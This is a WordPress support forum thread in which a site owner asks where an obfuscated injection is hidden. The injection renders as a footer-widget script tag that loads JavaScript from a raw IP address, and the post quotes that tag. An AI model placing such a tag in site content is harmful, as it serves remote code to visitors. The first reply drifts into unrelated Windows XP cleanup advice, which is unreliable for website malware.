Help identifing location of malware

  • Hi, im dealing with malware on a client website, there is one i havent been able to locate, its obviously obsfusctaed in code but when rendering the website it shows up as this line: <div id="text-6" class="foot-widget widget_text"> <div class="textwidget"><script type="text/javascript" src="//128.199.161.173/proxy/9/image.js"></script></div>
    If anyone could give me a clue about where to find it in order to delete it would be of great help

Viewing 5 replies - 1 through 5 (of 5 total)
  • Moderator James Huff

    (@macmanx)

    Remain calm and carefully follow this guide, which covers identifying and removing all currently known hack vectors.

    When you’re done, you may want to implement some (if not all) of the recommended security measures.

    First, and most important, remember that this is the operating system you’re dealing with, so don’t leap into your system files, deleting things willy-nilly as soon as you suspect trouble. If you blow it, you may render Windows unbootable.

    Second, cover your behind at every step. System Restore (in Windows XP and Me) can safely return you to the point just before you crashed. Click Start, Programs (All Programs in XP), Accessories, System Tools, System Restore, select Create a restore point, and step through the wizard. Make a new restore point before each change.

    You may also need to make your system files visible. Open Explorer or any folder window, and click Tools, Folder Options, View. Click Show hidden files and folders, and make sure that both ‘Hide extensions for known file types’ and ‘Hide protected operating system files (Recommended)’ are unchecked. Click Yes if you see any Windows warnings. (More on warnings later.) Run your up-to-date antivirus and anti-spyware apps. Finally, delete a file only if you strongly believe it’s part of a malware infestation. For example, don’t use the following techniques to remove old DLLs from your system folders.
    Ethan Stark
    [Signature removed by moderator per forum rules.]

    • This reply was modified 8 years, 3 months ago by James Huff.
    • This reply was modified 8 years, 3 months ago by bdbrown.
    • This reply was modified 8 years, 3 months ago by bdbrown.
    Thread Starter pabloec20

    (@pabloec20)

    Hi James, thanks a lot, i followed before posting in the forums it didn’t worked for me, this seems to be not a well known malware infection so I was hoping some more precise guidelines about where this widget texts are generated.

    Moderator James Huff

    (@macmanx)

    That particular guide covers every method we know for identifying and removing hack vectors, and if you follow it, considering the bulk-style methods it walks you through, you should take care of.

    If that didn’t work out, I suggest hiring someone for the task via https://jobs.wordpress.net/ or https://jetpack.pro/ and do not accept any hire or direct access offers posted to these forums, or hire a firm that specializes in this, like https://sucuri.net/ or https://vaultpress.com/

    Hi pabloec, did you manage to fix this?

    I found this malware on my site as well.

    Thank you,
    Luis

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Help identifing location of malware’ is closed to new replies.

Tags